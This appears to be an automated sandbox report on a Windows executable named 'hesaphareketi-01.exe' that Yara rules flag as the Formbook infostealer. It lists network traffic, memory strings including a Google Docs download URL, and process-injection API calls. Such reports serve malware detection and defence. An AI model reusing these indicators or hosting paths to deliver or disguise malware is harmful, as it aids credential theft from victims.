        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Mon, 04 Dec 2023 11:08:21 GMT | server: LiteSpeed
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Mon, 04 Dec 2023 11:08:24 GMT | server: LiteSpeed
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Mon, 04 Dec 2023 11:08:27 GMT | server: LiteSpeed
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 11:09:35 GMT | Server: Apache | Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT | Accept-Ranges: bytes | Content-Length: 1260 | Connection: close | Content-Type: text/html
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 11:09:38 GMT | Server: Apache | Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT | Accept-Ranges: bytes | Content-Length: 1260 | Connection: close | Content-Type: text/html
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 11:09:41 GMT | Server: Apache | Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT | Accept-Ranges: bytes | Content-Length: 1260 | Connection: close | Content-Type: text/html
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 11:09:45 GMT | Server: Apache | Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT | Accept-Ranges: bytes | Content-Length: 1260 | Connection: close | Content-Type: text/html
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 11:10:04 GMT | Server: Apache/2 | X-Powered-By: PHP/8.1.25 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | X-UA-Compatible: IE=edge | Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding,User-Agent | Content-Encoding: gzip | Content-Length: 11321 | Content-Type: text/html; charset=UTF-8
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 11:10:07 GMT | Server: Apache/2 | X-Powered-By: PHP/8.1.25 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | X-UA-Compatible: IE=edge | Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding,User-Agent | Content-Encoding: gzip | Content-Length: 11321 | Content-Type: text/html; charset=UTF-8
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 11:10:10 GMT | Server: Apache/2 | X-Powered-By: PHP/8.1.25 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | X-UA-Compatible: IE=edge | Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding,User-Agent | Content-Encoding: gzip | Content-Length: 11321 | Content-Type: text/html; charset=UTF-8
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 11:10:18 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 11:10:21 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 11:10:24 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 11:10:26 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:10:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 
77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:10:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 
77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:10:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 
77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 11:10:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesData Raw: 35 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 
64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 79 6f 74 75 6e 64 65 77 72 69 74 65 73 2e 63 6f 6d 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78
        Source: hesaphareketi-01.exe, 00000009.00000003.1273738509.000000000729D000.00000004.00000020.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: hesaphareketi-01.exe, 00000009.00000003.1273738509.000000000729D000.00000004.00000020.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: hesaphareketi-01.exe, 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp, hesaphareketi-01.exe, 00000000.00000000.689469037.000000000040A000.00000008.00000001.01000000.00000003.sdmp; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: hesaphareketi-01.exe, 00000009.00000001.1145004026.0000000000626000.00000020.00000001.01000000.00000007.sdmp; String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://apis.google.com
        Source: hesaphareketi-01.exe, 00000009.00000003.1273738509.000000000729D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://doc-0g-ag-docs.googleusercontent.com/
        Source: hesaphareketi-01.exe, 00000009.00000003.1273738509.000000000729D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://doc-0g-ag-docs.googleusercontent.com/%%doc-0g-ag-docs.googleusercontent.com
        Source: hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://doc-0g-ag-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/afsc4ag5
        Source: hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ssl.gstatic.com
        Source: hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.google-analytics.com;report-uri
        Source: hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com
        Source: hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.googletagmanager.com
        Source: hesaphareketi-01.exe, 00000009.00000003.1258329317.000000000729E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.com
        Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknown; Network traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknown; Network traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknown; HTTPS traffic detected: 142.250.65.174:443 -> 192.168.11.30:49744 version: TLS 1.2
        Source: unknown; HTTPS traffic detected: 142.251.40.129:443 -> 192.168.11.30:49748 version: TLS 1.2
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe; Code function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

        E-Banking Fraud

        Source: Yara match; File source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
        Source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
        Source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
        Source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
        Source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D4260 NtSetContextThread,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D4570 NtSuspendThread,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D34E0 NtCreateMutant,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2B10 NtAllocateVirtualMemory,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2B00 NtQueryValueKey,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2BC0 NtQueryInformationToken,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2B90 NtFreeVirtualMemory,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2B80 NtCreateKey,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2A10 NtWriteFile,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2AC0 NtEnumerateValueKey,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D2A80 NtClose,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D29F0 NtReadFile,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 19_2_037D38D0 NtGetContextThread,LdrInitializeThunk
